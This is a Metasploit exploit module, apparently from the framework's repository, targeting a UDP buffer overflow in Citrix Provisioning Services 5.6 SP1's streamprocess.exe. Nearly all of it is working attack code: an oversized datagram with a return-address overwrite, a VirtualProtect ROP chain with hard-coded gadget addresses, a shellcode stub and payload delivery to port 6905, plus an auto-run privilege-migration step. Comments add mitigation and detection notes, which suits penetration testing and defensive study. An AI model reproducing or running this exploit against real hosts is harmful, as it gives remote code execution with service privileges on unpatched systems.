Path: blob/master/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
# -*- coding: binary -*-

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for a remote buffer overflow in the streamprocess.exe service
# of Citrix Provisioning Services 5.6 SP1 (fixed by Hotfix CPVS56SP1E043,
# Citrix advisory CTX130846).  A single UDP datagram is sent to port 6905 whose
# first dword is opcode 0x40020000 ("DATA MSG"); its body overruns the target
# buffer, overwrites a return address with target.ret and lands in a ROP chain
# that makes the payload region executable before running it.
#
# Defensive notes (all derived from the packet layout built in #exploit):
# - Mitigation: apply the hotfix; keep 6905/UDP off any network that does not
#   need provisioning traffic; run the service with the least privilege it
#   needs, since 'Privileged' => true below means a session inherits the
#   service's rights.
# - Detection: before the payload is written in, the datagram is already
#   4 + 18 + 4 + 2012 + 4 = 2042 bytes long, while the 4-byte length field
#   inside it is sent as zero.  The filler is random uppercase text, so
#   signatures should key on the fixed opcode, the zeroed length field and the
#   oversized datagram rather than on filler content.  Nothing is read back, so
#   the network-side evidence is one inbound datagram.
# - The gadget addresses are hard-coded for streamprocess.exe, so the chain
#   presumably relies on that image loading at its preferred base; rebasing or
#   ASLR for that binary would break this particular chain, but that is no
#   substitute for patching.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Udp

  # Registers module metadata, payload constraints (no \x00 byte, payload
  # address expected in ECX) and the single target's overflow offset and
  # return address, then exposes RPORT with the service's default 6905.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow',
      'Description'    => %q{
          This module exploits a remote buffer overflow in the Citrix Provisioning Services
        5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the
        6905/UDP port. The module has been successfully tested on Windows Server 2003 SP2,
        Windows 7, and Windows XP SP3.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'AbdulAziz Hariri', # Initial discovery via ZDI
          'alino <26alino[at]gmail.com>' # Metasploit module
        ],
      'References'     =>
        [
          ['OSVDB', '75780'],
          ['BID', '49803'],
          ['ZDI', '12-009'],
          ['URL', 'http://support.citrix.com/article/CTX130846']
        ],
      'DefaultOptions' =>
        {
          # Payload exits through the process exit routine (Metasploit EXITFUNC
          # convention) rather than the thread.
          'EXITFUNC' => 'process',
          # Runs automatically once a session opens; presumably migrates the
          # session out of streamprocess.exe -- confirm against that post module.
          # Responders should therefore not expect the session to remain in the
          # exploited service process.
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
        },
      'Payload'        =>
        {
          # NUL terminates the string handling in the target; the ROP chain
          # below avoids NULs in its immediates by negating them.
          'BadChars' => "\x00",
          # The stub written at offset 494 leaves the payload address in ECX.
          'EncoderOptions' => {'BufferRegister'=>'ECX'},
        },
      'Platform'       => ['win'],
      'Targets'        =>
        [
          [ 'Citrix Provisioning Services 5.6 SP1',
            {
              'Offset' => 2012,      # bytes of filler before the overwritten return address
              'Ret'    => 0x0045403a # ADD ESP,664; RETN 04 streamprocess.exe
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2011-11-04', #CTX130846 creation date
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(6905)])
  end

  # Builds the malformed DATA MSG datagram, patches the ROP sled, ROP chain,
  # ECX-loading stub and encoded payload into fixed offsets of the filler, and
  # sends it once over UDP.  No response is read; control passes to the
  # payload handler immediately after the send.
  def exploit

    packet = "\x00\x00\x02\x40" # DATA MSG (opcode 0x40020000 little-endian)
    packet << rand_text_alpha_upper(18)
    packet << "\x00\x00\x00\x00" # Length (sent as zero despite the oversized body)
    packet << rand_text_alpha_upper(target['Offset'])
    packet << [target.ret].pack('V')

    # 38 copies of a RETN gadget (152 bytes) that slide execution into the chain.
    rop_nop = [0x004a072c].pack('V') * 38 # RETN streamprocess.exe

    # VirtualProtect chain.  dwSize and flNewProtect are stored negated
    # (0xfffff9d0 -> 0x630, 0xffffffc0 -> 0x40 PAGE_EXECUTE_READWRITE) and
    # fixed up with NEG EAX so the chain contains no \x00 bad char; PUSHAD
    # then lays the prepared registers out as the call's arguments.
    rop_gadgets =
      [
        0x0045b141, # POP EAX; RETN streamprocess.exe
        0x1009a1bc, # VirtualProtect()
        0x00436d44, # MOV EAX,DWORD PTR DS:[EAX]; RETN streamprocess.exe
        0x004b0bbe, # XCHG EAX,ESI; RETN streamprocess.exe
        0x004ad0cf, # POP EBP; RETN streamprocess.exe
        0x00455d9d, # PUSH ESP; RETN streamprocess.exe
        0x00497f5a, # POP EAX; RETN streamprocess.exe
        0xfffff9d0, # dwSize
        0x00447669, # NEG EAX; RETN streamprocess.exe
        0x004138a7, # ADD EBX,EAX; XOR EAX,EAX; RETN streamprocess.exe
        0x00426305, # POP ECX; RETN streamprocess.exe
        0x00671fb9, # lpflOldProtect
        0x004e41e6, # POP EDI; RETN streamprocess.exe
        0x0040f004, # RETN streamprocess.exe
        0x00495c05, # POP EAX; RETN streamprocess.exe
        0xffffffc0, # flNewProtect
        0x0042c79a, # NEG EAX; RETN streamprocess.exe
        0x0049b676, # XCHG EAX,EDX; RETN streamprocess.exe
        0x0045c1fa, # POP EAX; RETN streamprocess.exe
        0x90909090, # NOP
        0x00435bbe, # PUSHAD; RETN streamprocess.exe
      ].pack("V*")

    # Fixed layout inside the random filler: sled at 258, chain at 410,
    # 10-byte stub at 494, payload from 504.  These fixed regions are what a
    # content signature can match; the surrounding filler cannot.
    packet[258, rop_nop.length] = rop_nop
    packet[410, rop_gadgets.length] = rop_gadgets
    # jmp/pop/call sequence that leaves the address of offset 504 in ECX and
    # enters it, matching 'BufferRegister' => 'ECX' in the payload options.
    packet[494, 10] = "\xeb\x03\x59\xff\xd1\xe8\xf8\xff\xff\xff"
    packet[504, payload.encoded.length] = payload.encoded

    print_status("Trying target #{target.name}...")

    # One datagram, fire-and-forget: the socket is never read.
    connect_udp
    udp_sock.put(packet)

    handler
    disconnect_udp
  end
end